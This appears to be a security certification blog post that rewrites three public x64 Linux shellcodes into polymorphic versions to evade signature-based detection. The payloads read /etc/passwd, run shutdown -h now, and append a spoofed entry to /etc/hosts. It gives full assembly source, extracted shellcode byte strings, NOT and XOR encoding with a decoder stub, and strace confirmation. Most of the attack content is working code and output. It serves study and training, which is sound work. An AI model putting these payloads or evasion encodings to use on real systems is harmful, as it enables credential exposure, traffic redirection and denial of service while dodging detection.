After completing the video lectures of the Security Tube Linux 64 bit Assembler Expert course (SLAE64), a series of assessments must be completed to gain certification. This is the sixth assignment; take three x64 payloads from ShellStorm and create new, polymorphic versions which have the same functionality.
While this sounds super cool, what we’re actually doing is simply changing the content of the shellcode to try to evade detection by basic security tools that use signature-based matching to recognise threats. A constraint of the assignment is that each new version must stay within 150% of the original payload size.
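As a quick illustration of the size constraint, the sketch below works out the byte ceiling for each of the three payloads, using the original sizes quoted later in this post. The helper name `size_limit` and the choice to round down are my own assumptions, not part of the assignment text.

```python
def size_limit(original_size: int, percent: int = 150) -> int:
    """Largest allowed size, in whole bytes, for a polymorphic version."""
    # Integer arithmetic rounds down, which is the conservative reading.
    return original_size * percent // 100


# Original payload sizes as quoted in this post.
originals = {
    "read /etc/passwd": 82,
    "shutdown -h now": 65,
    "add map in /etc/hosts": 110,
}

for name, size in originals.items():
    print(f"{name}: original {size} bytes, limit {size_limit(size)} bytes")
```

All three rewritten payloads in this post end up at or below these ceilings.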
Dump Password Payload
As most of the previous assignments have focused on network operations, I chose the first shellcode sample because it used file I/O.
The starting point is Mr.Un1k0d3r’s Read /etc/passwd payload which is 82 bytes in size:
BITS 64
; Author Mr.Un1k0d3r - RingZer0 Team
; Read /etc/passwd Linux x86_64 Shellcode
; Shellcode size 82 bytes
global _start
section .text
_start:
    jmp _push_filename
_readfile:
    ; syscall open file
    pop rdi                     ; pop path value
    ; NULL byte fix
    xor byte [rdi + 11], 0x41
    xor rax, rax
    add al, 2
    xor rsi, rsi                ; set O_RDONLY flag
    syscall
    ; syscall read file
    sub sp, 0xfff
    lea rsi, [rsp]
    mov rdi, rax
    xor rdx, rdx
    mov dx, 0xfff               ; size to read
    xor rax, rax
    syscall
    ; syscall write to stdout
    xor rdi, rdi
    add dil, 1                  ; set stdout fd = 1
    mov rdx, rax
    xor rax, rax
    add al, 1
    syscall
    ; syscall exit
    xor rax, rax
    add al, 60
    syscall
_push_filename:
    call _readfile
    path: db "/etc/passwdA"
The original code uses the jump, call, pop method to locate the address of the ‘/etc/passwd’ string at the end of the payload. We can mutate this by converting the string into a hex number and pushing it onto the stack. This involves reversing the string and breaking it into 8 byte chunks. Note that we can’t use a NULL terminator on the string, so we’ll use a value of 0x1 and fix it afterwards.
push 0x01647773             ; 0x01 + dws
mov rbx, 0x7361702f6374652f ; sap/cte/
push rbx
mov rdi, rsp                ; Get address of path string
dec byte [rdi+11]           ; NULL byte fix
This change saves 2 bytes and transforms the raw strings visible in the shellcode.
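The string conversion described above can be scripted rather than done by hand. This is a minimal sketch, assuming a one byte pad value of 0x01 in place of the terminator; the function name `stack_pushes` is hypothetical and not part of the original toolchain.

```python
def stack_pushes(path: bytes, pad: int = 0x01) -> list:
    """Return the values to push, in push order, for `path` plus one pad byte."""
    data = path + bytes([pad])  # the pad byte stands in for the NULL terminator
    chunks = [data[i:i + 8] for i in range(0, len(data), 8)]
    # The stack grows downwards, so the tail of the string is pushed first.
    # Reading each chunk as a little-endian integer gives the "reversed" hex value.
    return [int.from_bytes(chunk, "little") for chunk in reversed(chunks)]


for value in stack_pushes(b"/etc/passwd"):
    print(hex(value))
```

The two values printed correspond to the immediate used by the `push` and the constant loaded into RBX. The pad byte lands at offset 11 of the string, which is the byte the `dec` instruction turns back into a NULL.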
The remainder of the first section sets the parameters for the SYS_OPEN syscall. We can modify these and save another 2 bytes:
push 2
sub rsi, rsi                ; set O_RDONLY flag
pop rax
syscall
The next section of the payload uses SYS_READ to read the content of the file into a buffer of 0xfff (4095 decimal) bytes which is allocated on the stack. There isn’t much to work with here, but we can optimise the parameter shuffling by swapping in known zero values instead of XORing, and use a subtract operation to hide the 0xfff value: DX starts at zero, so subtracting 0xf001 wraps around to 0x0fff.
push rax                    ; Save file handle
xchg rsi, rax               ; Zero out RAX
push rax
pop rdx
pop rdi
sub dx, 0xf001
sub rsp, rdx                ; Make room on the stack
lea rsi, [rsp]              ; Pass the buffer address
syscall
These changes save a further 4 bytes.
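The subtraction trick relies on 16 bit wraparound in DX. A small sketch of that arithmetic, with `sub16` as a hypothetical helper that models the instruction:

```python
def sub16(value: int, operand: int) -> int:
    """Model a 16-bit SUB: the result wraps modulo 2**16."""
    return (value - operand) & 0xFFFF


# DX is zero before the subtraction because RDX was loaded with a zero.
size = sub16(0, 0xF001)
print(hex(size), size)
```

Because the upper bits of RDX are already zero, the full register ends up holding the same buffer size as the original code without the literal 0xfff appearing in the shellcode.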
The third section uses SYS_WRITE to dump the data from the stack buffer to STDOUT. Again, there isn’t much to work with, but by optimising the parameters we can save 8 bytes:
push 1
pop rdx
xchg rax, rdx               ; syscall id and read size
push rax
pop rdi                     ; fd id
syscall
The last section is a simple SYS_EXIT; all we can do here is try to save some bytes:
push 60
pop rax
syscall
Putting the whole thing together gives us pw_dump.nasm:
push 0x01647773
mov rbx, 0x7361702f6374652f
push rbx
mov rdi, rsp                ; Get addr of path string
dec byte [rdi+11]           ; NULL byte fix
push 2
sub rsi, rsi                ; set O_RDONLY flag
pop rax
syscall                     ; sys_open
push rax                    ; Save file handle
xchg rsi, rax               ; Zero out RAX
push rax
pop rdx
pop rdi                     ; File ID
sub dx, 0xf001
sub rsp, rdx                ; Make room on the stack
lea rsi, [rsp]              ; Pass the buffer address
syscall                     ; sys_read
push 1
pop rdx
xchg rax, rdx               ; syscall id and read size
push rax
pop rdi                     ; STDOUT (1)
syscall                     ; sys_write
push 60
pop rax
syscall                     ; sys_exit
Extracting the payload results in a 64 byte shellcode string; a saving of 18 bytes:
"\x68\x73\x77\x64\x01\x48\xbb\x2f\x65\x74\x63\x2f" "\x70\x61\x73\x53\x48\x89\xe7\xfe\x4f\x0b\x6a\x02" "\x48\x29\xf6\x58\x0f\x05\x50\x48\x96\x50\x5a\x5f" "\x66\x81\xea\x01\xf0\x48\x29\xd4\x48\x8d\x34\x24" "\x0f\x05\x6a\x01\x5a\x48\x92\x50\x5f\x0f\x05\x6a" "\x3c\x58\x0f\x05"
The next shellcode sample to be tackled is shutdown -h now by Osanda Malith Jayathissa which is a 65 byte payload.
; Title: shutdown -h now x86_64 Shellcode - 65 bytes
; Platform: linux/x86_64
; Date: 2014-06-27
; Author: Osanda Malith Jayathissa (@OsandaMalith)
section .text
global _start
_start:
    xor rax, rax
    xor rdx, rdx
    push rax
    push byte 0x77
    push word 0x6f6e            ; now
    mov rbx, rsp
    push rax
    push word 0x682d            ;-h
    mov rcx, rsp
    push rax
    mov r8, 0x2f2f2f6e6962732f  ; /sbin/shutdown
    mov r10, 0x6e776f6474756873
    push r10
    push r8
    mov rdi, rsp
    push rdx
    push rbx
    push rcx
    push rdi
    mov rsi, rsp
    add rax, 59
    syscall
There is another version of this code from another SLAE student on the ShellStorm site which is 1 byte smaller and uses some payload encoding. I decided to start with the original and see what I could do.
The code is an execve call to the system’s shutdown command. At the start the RAX and RDX registers are cleared. Looking through the code, RDX isn’t used until the end, where it becomes a syscall parameter, while RAX is used to push zeros onto the stack until the syscall at the end. This seems wasteful so we’ll just clear RDX for zero pushes and worry about RAX later.
_start:
    xor rdx, rdx
    push rdx
The first PUSH adds a NULL to terminate the argument array which will be built in the next steps.
The next three sections push the argument strings onto the stack. As we’re working through the argument array in reverse, the ‘now’ string is the first item.
The original code pushes hexadecimal values to build the strings. I decided to use NOT inverted strings throughout the code to hide the content. This conceals the string values in the raw shellcode and gets around the NULL byte problem at the same time. However, pushing and NOTing the strings one at a time bloated the shellcode up to about 82 bytes.
...
push dword 0xffffffffff889091 ; inverse of 'now\x00'
not qword [rsp]
push rsp
pop rbx
...
A second attempt at pushing the inverted strings and running a NOT loop over the stack afterwards got the code down to 76 bytes, but this was still not good enough. Some restructuring is required.
First, we define our inverted strings as data bytes and get the address using the jump, call, pop method:
    jmp _str                    ; Get addr of strings in RAX
_build:
    pop rax
    ...
_str:
    call _build
    _now: db 0x91, 0x90, 0x88, 0xff
    _h:   db 0xd2, 0x97, 0xff
    _cmd: db 0xd0, 0x8c, 0x9d, 0x96, 0x91, 0xd0, 0x8c, 0x97, 0x8a, 0x8b, 0x9b, 0x90, 0x88, 0x91, 0xff
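The inverted data bytes do not have to be worked out by hand. A minimal sketch that produces them, assuming each string is stored with its NULL terminator included (which is why every `db` line ends in 0xff); `not_encode` is a hypothetical helper name:

```python
def not_encode(text: bytes) -> list:
    """Invert every byte of `text` plus its NULL terminator."""
    return [b ^ 0xFF for b in text + b"\x00"]


strings = (("_now", b"now"), ("_h", b"-h"), ("_cmd", b"/sbin/shutdown"))

for label, text in strings:
    encoded = not_encode(text)
    print(f"{label}: db " + ", ".join(f"0x{b:02x}" for b in encoded))
```

XOR with 0xff is the same operation as a bytewise NOT, so running it a second time restores the original bytes.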
With the start address of the data in RAX, we can build the argument array on the stack and store its address in RSI ready for the execve syscall:
push rax                    ; 'now'
lea rdi, [rax+4]            ; '-h'
push rdi
lea rdi, [rax+7]            ; '/sbin/shutdown'
push rdi
push rsp                    ; Save arg array addr
pop rsi
Using RDI for the effective address calculations also means that the command string for the syscall is populated at this point.
The strings are still mangled, but we can run the NOT loop over the original data location using the value in RAX:
    push 0x16
    pop rcx
_decode:
    not byte [rax]
    inc rax
    loop _decode
Now RDI and RSI point to decoded strings and RDX was cleared at the start, so all that remains is to trigger the syscall:
push 0x3b
pop rax
syscall
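To check the loop count and the offsets used in the LEA instructions, the decode can be simulated offline. This is only a sketch of the loop's effect on the data bytes, not of the shellcode itself; `c_string` is a hypothetical helper that reads a NULL terminated string from a buffer.

```python
# The data bytes from the _now, _h and _cmd labels, in order.
data = bytes([
    0x91, 0x90, 0x88, 0xff,
    0xd2, 0x97, 0xff,
    0xd0, 0x8c, 0x9d, 0x96, 0x91, 0xd0, 0x8c, 0x97,
    0x8a, 0x8b, 0x9b, 0x90, 0x88, 0x91, 0xff,
])

# Mirror the loop: NOT each of the first 0x16 bytes.
decoded = bytes(b ^ 0xFF for b in data[:0x16])


def c_string(buf: bytes, offset: int) -> bytes:
    """Read a NULL-terminated string starting at `offset`."""
    return buf[offset:buf.index(0, offset)]


print(len(data))
for offset in (0, 4, 7):
    print(offset, c_string(decoded, offset))
```

The data is exactly 0x16 bytes long, so the loop covers all three strings, and offsets 0, 4 and 7 line up with the start of each argument.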
The complete listing of shutdown.nasm is pretty compact:
global _start
section .TEXT exec write
_start:
    xor rdx, rdx
    push rdx                    ; NULL to terminate arg array
    jmp _str                    ; Get addr of strings in RAX
_build:
    pop rax
    ; Load string addresses onto stack
    push rax                    ; 'now'
    lea rdi, [rax+4]            ; '-h'
    push rdi
    lea rdi, [rax+7]            ; '/sbin/shutdown'
    push rdi
    push rsp                    ; Save arg array addr
    pop rsi
    ; Decode strings
    push 0x16
    pop rcx
_decode:
    not byte [rax]
    inc rax
    loop _decode
    push 0x3b
    pop rax
    syscall
_str:
    call _build
    _now: db 0x91, 0x90, 0x88, 0xff
    _h:   db 0xd2, 0x97, 0xff
    _cmd: db 0xd0, 0x8c, 0x9d, 0x96, 0x91, 0xd0, 0x8c, 0x97, 0x8a, 0x8b, 0x9b, 0x90, 0x88, 0x91, 0xff
Extracting the shellcode results in a 62 byte string, just squeezing under the original and alternative implementations.
"\x48\x31\xd2\x52\xeb\x1d\x58\x50\x48\x8d\x78" "\x04\x57\x48\x8d\x78\x07\x57\x54\x5e\x6a\x16" "\x59\xf6\x10\x48\xff\xc0\xe2\xf9\x6a\x3b\x58" "\x0f\x05\xe8\xde\xff\xff\xff\x91\x90\x88\xff" "\xd2\x97\xff\xd0\x8c\x9d\x96\x91\xd0\x8c\x97" "\x8a\x8b\x9b\x90\x88\x91\xff";
Add Host Mapping
For the last example I decided to try another file-based example: Add map in /etc/hosts file, also by Osanda Malith Jayathissa. This is a 110 byte payload that adds a spoof mapping to the /etc/hosts file, allowing redirection of network traffic.
; Title: Add map in /etc/hosts file - 110 bytes
; Date: 2014-10-29
; Platform: linux/x86_64
; Website: http://osandamalith.wordpress.com
; Author: Osanda Malith Jayathissa (@OsandaMalith)
global _start
section .text
_start:
    ;open
    xor rax, rax
    add rax, 2                  ; open syscall
    xor rdi, rdi
    xor rsi, rsi
    push rsi                    ; 0x00
    mov r8, 0x2f2f2f2f6374652f  ; stsoh/
    mov r10, 0x7374736f682f2f2f ; /cte/
    push r10
    push r8
    add rdi, rsp
    xor rsi, rsi
    add si, 0x401
    syscall
    ;write
    xchg rax, rdi
    xor rax, rax
    add rax, 1                  ; syscall for write
    jmp data
write:
    pop rsi
    mov dl, 19                  ; length in rdx
    syscall
    ;close
    xor rax, rax
    add rax, 3
    syscall
    ;exit
    xor rax, rax
    mov al, 60
    xor rdi, rdi
    syscall
data:
    call write
    text db '127.1.1.1 google.lk'
For this exercise I decided to use a different method of string referencing. A CALL instruction can be used to jump over an inline string while helpfully placing the string’s address on the stack. Unfortunately, because a near CALL encodes its target as a 4 byte relative displacement, a short forward call introduces zeros into the shellcode. This is normally handled by calling backwards, which makes the displacement negative, but in this example we’ll try something else.
In the first section where we call the SYS_OPEN syscall, the path string can be incorporated into the code with a CALL. This really helps reduce the size of the final shellcode:
    ; open
    xor rsi, rsi
    add si, 0x401               ; O_WRONLY and O_APPEND flags
    call _jump1
    db '/etc/hosts', 0x00
_jump1:
    pop rdi                     ; path reference
    push 2
    pop rax
    syscall
However, the disassembly shows the zeros introduced by the CALL instruction:
0000000000600078 <_start>:
  600078: 48 31 f6          xor rsi,rsi
  60007b: 66 81 c6 01 04    add si,0x401
  600080: e8 0b 00 00 00    call 600090 <_jump1>
  600085: 2f 65 74 63 ...   (bad)
  ...
0000000000600090 <_jump1>:
  600090: 5f                pop rdi
  600091: 6a 02             push 0x2
  600093: 58                pop rax
  600094: 0f 05             syscall
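The source of those zeros is easy to see by encoding the instruction by hand. A minimal sketch, assuming the standard near CALL encoding of opcode 0xE8 followed by a signed 32 bit little-endian displacement; `encode_call` is a hypothetical helper:

```python
import struct


def encode_call(rel32: int) -> bytes:
    """Encode a near CALL: opcode 0xE8 plus a signed 32-bit displacement."""
    return b"\xe8" + struct.pack("<i", rel32)


forward = encode_call(0x0B)    # skip the 11 byte inline path string
backward = encode_call(-0x22)  # a call to a label earlier in the code

print(forward.hex(" "))
print(backward.hex(" "))
```

A small positive displacement pads out with three zero bytes, while a small negative one pads with 0xff. The backward value used here matches the call bytes in the extracted shutdown shellcode earlier in this post.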
To solve this and obscure the string contents, we will encode the entire payload and write a small decoder header.
The remainder of the code is quite straightforward and we can make some quick optimisations to bring the size down.
The final pre-encoding version is addhost_pre_encode.nasm:
_start:
    ; open
    xor rsi, rsi
    add si, 0x401               ; O_WRONLY and O_APPEND flags
    call _jump1
    db '/etc/hosts', 0x00
_jump1:
    pop rdi                     ; path reference
    push 2
    pop rax
    syscall
    ; write
    xchg rax, rdi
    push 1
    pop rax                     ; syscall for write
    call _jump2
    db '127.1.1.1 google.lk', 0xa
_jump2:
    pop rsi
    push 20                     ; data length in rdx
    pop rdx
    syscall
    ;close
    push 3
    pop rax
    syscall
    ;exit
    push 60
    pop rax
    syscall
The optimisations have squeezed the code down to 76 bytes, leaving 34 bytes for the decoder stub if the result is to stay under the original 110 bytes.
A simple one byte XOR encoding of the shellcode requires a few lines of Python:
MBP:slae64$ python
Python 2.7.3 (default, Oct 26 2016, 21:01:49)
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import sys
>>> payload = [0x48,0x31,0xf6,0x66,0x81,0xc6,0x01,0x04,0xe8,0x0b,0x00,0x00,0x00,0x2f,0x65, ...
>>> for b in payload:
...     sys.stdout.write(hex(b ^ 0x41) + ',')
...
0x9,0x70,0xb7,0x27,0xc0,0x87,0x40,0x45,0xa9,0x4a,0x41,0x41,0x41,0x6e,0x24,0x35,0x22,0x6e,0x29,
0x2e,0x32,0x35,0x32,0x41,0x1e,0x2b,0x43,0x19,0x4e,0x44,0x9,0xd6,0x2b,0x40,0x19,0xa9,0x55,0x41,
0x41,0x41,0x70,0x73,0x76,0x6f,0x70,0x6f,0x70,0x6f,0x70,0x61,0x26,0x2e,0x2e,0x26,0x2d,0x24,0x6f,
0x2d,0x2a,0x4b,0x1f,0x2b,0x55,0x1b,0x4e,0x44,0x2b,0x42,0x19,0x4e,0x44,0x2b,0x7d,0x19,0x4e,0x44,
>>>
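For anyone repeating this on Python 3, the same encoding could be sketched as a small function. The name `xor_encode` and the guard against the key byte appearing in the payload are my own additions; the guard matters because any payload byte equal to the key would encode to a NULL. Only the first 15 payload bytes shown in the session above are used here.

```python
def xor_encode(payload: bytes, key: int) -> bytes:
    """XOR every payload byte with a single-byte key."""
    if key in payload:
        # A byte equal to the key would become 0x00 in the output.
        raise ValueError("key byte occurs in payload; output would contain a NULL")
    return bytes(b ^ key for b in payload)


# First 15 bytes of the pre-encoding payload, as listed in the session above.
prefix = bytes([0x48, 0x31, 0xf6, 0x66, 0x81, 0xc6, 0x01, 0x04,
                0xe8, 0x0b, 0x00, 0x00, 0x00, 0x2f, 0x65])

encoded = xor_encode(prefix, 0x41)
print(",".join(f"0x{b:02x}" for b in encoded))
```

The zero bytes from the CALL displacement become 0x41 after encoding, so the encoded form contains no NULLs.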
The decoder header uses a jump, call and pop to get the address of the payload, then a simple bytewise XOR loop to decode the data.
_start:
    jmp _code_marker            ; Get the payload address
_decode:
    pop rax
    push 76                     ; Decode
    pop rcx
_decode_loop:
    xor byte [rax], 0x41
    inc rax
    loop _decode_loop
    jmp _payload                ; Jump to decoded payload
_code_marker:
    call _decode
_payload:
    db 0x09,0x70,0xb7,0x27,0xc0,0x87,0x40,0x45,0xa9,0x4a
    db 0x41,0x41,0x41,0x6e,0x24,0x35,0x22,0x6e,0x29,0x2e
    db 0x32,0x35,0x32,0x41,0x1e,0x2b,0x43,0x19,0x4e,0x44
    db 0x09,0xd6,0x2b,0x40,0x19,0xa9,0x55,0x41,0x41,0x41
    db 0x70,0x73,0x76,0x6f,0x70,0x6f,0x70,0x6f,0x70,0x61
    db 0x26,0x2e,0x2e,0x26,0x2d,0x24,0x6f,0x2d,0x2a,0x4b
    db 0x1f,0x2b,0x55,0x1b,0x4e,0x44,0x2b,0x42,0x19,0x4e
    db 0x44,0x2b,0x7d,0x19,0x4e,0x44
There is a little bit of faff with labels on the payload: we must jump over the call _decode instruction to the _payload marker after the decode loop completes, or we will get stuck in an endless decoder loop. Fortunately, labels don’t add to the size of the shellcode and short jumps are only two bytes.
This completes the addhost.nasm code. The final size of the shellcode is 97 bytes, well under the original 110 bytes, even with added content obfuscation.
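The size figures and the effect of the decoder loop can be sanity-checked offline. This sketch simulates only the XOR pass over the encoded data bytes from the listing above; the stub size is derived from the 97 byte total quoted in this post rather than measured from an assembled binary.

```python
# The encoded payload bytes from the _payload label.
encoded = bytes([
    0x09, 0x70, 0xb7, 0x27, 0xc0, 0x87, 0x40, 0x45, 0xa9, 0x4a,
    0x41, 0x41, 0x41, 0x6e, 0x24, 0x35, 0x22, 0x6e, 0x29, 0x2e,
    0x32, 0x35, 0x32, 0x41, 0x1e, 0x2b, 0x43, 0x19, 0x4e, 0x44,
    0x09, 0xd6, 0x2b, 0x40, 0x19, 0xa9, 0x55, 0x41, 0x41, 0x41,
    0x70, 0x73, 0x76, 0x6f, 0x70, 0x6f, 0x70, 0x6f, 0x70, 0x61,
    0x26, 0x2e, 0x2e, 0x26, 0x2d, 0x24, 0x6f, 0x2d, 0x2a, 0x4b,
    0x1f, 0x2b, 0x55, 0x1b, 0x4e, 0x44, 0x2b, 0x42, 0x19, 0x4e,
    0x44, 0x2b, 0x7d, 0x19, 0x4e, 0x44,
])

TOTAL_SIZE = 97  # final shellcode size quoted in the post
stub_size = TOTAL_SIZE - len(encoded)

# Mirror the decoder loop: XOR each byte with 0x41.
decoded = bytes(b ^ 0x41 for b in encoded)

print(len(encoded), stub_size)
print(b"/etc/hosts\x00" in decoded)
print(b"127.1.1.1 google.lk\n" in decoded)
print(0 in encoded)
```

The payload length agrees with the loop counter pushed by the stub, both inline strings reappear after decoding, and the encoded data itself is free of NULL bytes.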
We can test the operation of the shellcode using strace to confirm the syscalls:
MBP:slae64$ strace ./addhost
execve("./addhost", ["./addhost"], [/* 23 vars */]) = 0
open("/etc/hosts", O_WRONLY|O_APPEND) = 3
write(3, "127.1.1.1 google.lk\n", 20) = 20
close(3) = 0
_exit(3) = ?
MBP:slae64$
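The flag names strace prints can be tied back to the 0x401 value loaded into SI. A small sketch, assuming the usual Linux x86_64 values for the open flags (they are hard-coded here because they differ on other platforms); `describe_flags` is a hypothetical helper that only knows about the bits relevant to this payload.

```python
# Assumed Linux x86_64 values for the open(2) flag bits.
O_APPEND = 0x400
ACCESS_MODES = {0: "O_RDONLY", 1: "O_WRONLY", 2: "O_RDWR"}


def describe_flags(flags: int) -> str:
    """Name the access mode and the append bit of an open() flags value."""
    names = [ACCESS_MODES.get(flags & 3, "invalid access mode")]
    if flags & O_APPEND:
        names.append("O_APPEND")
    return "|".join(names)


print(describe_flags(0x401))
```

The low two bits select the access mode, so 0x401 opens the file write-only with every write appended to the end, which is what the trace reports.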
I have deliberately tried to select some different payloads in this assignment and I have used different techniques to add some variety to the results. This has been very useful in allowing me to experiment with some of the optimisations and tricks I have seen while studying the SLAE64 course.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
Student ID: SLAE64-1471